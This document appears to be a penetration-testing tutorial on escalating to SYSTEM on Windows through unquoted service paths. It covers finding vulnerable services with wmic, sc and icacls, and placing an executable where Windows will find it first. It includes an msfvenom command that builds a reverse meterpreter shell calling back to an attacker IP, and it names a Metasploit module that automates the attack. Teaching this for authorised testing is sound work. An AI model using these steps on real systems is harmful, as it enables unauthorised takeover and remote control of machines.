system and host attacks unquoted service paths

Unquoted Service Paths

Unquoted Service Path vulnerabilities abuse the way Windows searches for binaries when a service is started. They are found when a path to a binary contains spaces and has not been put into quotations.

First of all, we need to identify a vulnerable service. We can use automated tools such as jaws.ps1 to do this, but we can do it manually, too. The manual way is to use wmic like so: wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """

We will need to make sure that we can stop and start the service as the user we have gained access to the victim system as. We can do this using sc stop VulnService and sc start VulnService We can check the state of a service using sc query VulnService

We also need to make sure that the vulnerable service starts as the system user. We can do this by running sc qc VulnService and looking at the SERVICE_START_NAME which will hopefully show as LocalSystem

Next, we need to stop the service and then check the permissions of the targeted directory where we aim to upload our malicious executable file. To do this, we can navigate to the parent directory of the targeted directory and run icacls VulnDirectory We are looking to see if we have the ability to write to the directory or to modify it. We will hopefully see (M) or (W)

Our task is to upload malware into the unquoted service path at a location which will be searched by Windows before the legitimate executable for the service is found. The malware will depend on the context of the compromised machine, but a simple example would be a reverse meterpreter shell generated using msfvenom: sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.8.46.6 LPORT=4445 --platform Windows -f exe > Vuln.exe

Assuming that we can write to the targeted directory, we can now upload our malware in the path of the service and give it a name which will be executed when the service starts. When trying to work out where to place the malware, we can look for where there are spaces in the unquoted service path. Here is an example: C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe In this example, we could try to place our malware at the following path: C:\Program Files\VMware\VMware.exe

Here is another example of an unquoted service path: C:\Program Files(x86)\Canon\IJ Scan Utility\SETEVENT.exe We could try to place our malware at the following path: C:\Program Files(x86)\Canon\IJ.exe

We can now start a handler before starting the service on the victim machine. It might be that the shell is unstable, so we can migrate it to a different process when it starts by modifying the handler before running it set set AutoRunScript migrate -n svchost.exe We could also use set AutoRunScript migrate -f to spawn a new notepad process which will be migrated to automatically.

msfconsole also has a module we can use to automatically exploit unquoted service paths: use exploit/windows/local/trusted_service_path